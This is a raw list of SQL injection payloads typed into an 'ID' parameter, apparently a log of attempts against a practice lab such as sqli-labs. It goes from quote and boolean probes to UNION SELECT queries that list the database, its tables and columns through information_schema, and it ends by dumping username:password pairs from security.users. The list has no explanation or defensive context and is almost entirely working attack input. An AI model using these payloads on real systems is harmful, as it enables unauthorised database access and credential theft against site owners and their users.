ID:1
ID:1'
ID:1"
ID:1 \
ID:1'
ID:1'-- 
ID:1' or '1
ID:-1' or '-1
ID:-1' or '-1
ID:-100' or '100
ID:100' or '100
ID:2
ID:1' or '1
ID:1' or '2
ID:2' or '1
ID:2' or '2
ID:12000
ID:12000'
ID:12000' and 1=1
ID:12000' or '1
ID:12000' or '12000
ID:12000' or '11000
ID:12000' or '11000'
ID:12000' or '11000
ID:1';
ID:1;select
ID:1') -- 
ID:-1')union select 1,2,database() -- 
ID:-1') or 1-- 
ID:-1') union select 1,2,database()-- 
ID:-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()-- 
ID:-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='name'-- 
ID:-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'-- 
ID:-1') union select 1,2,group_concat(username,":",password) from security.users-- 
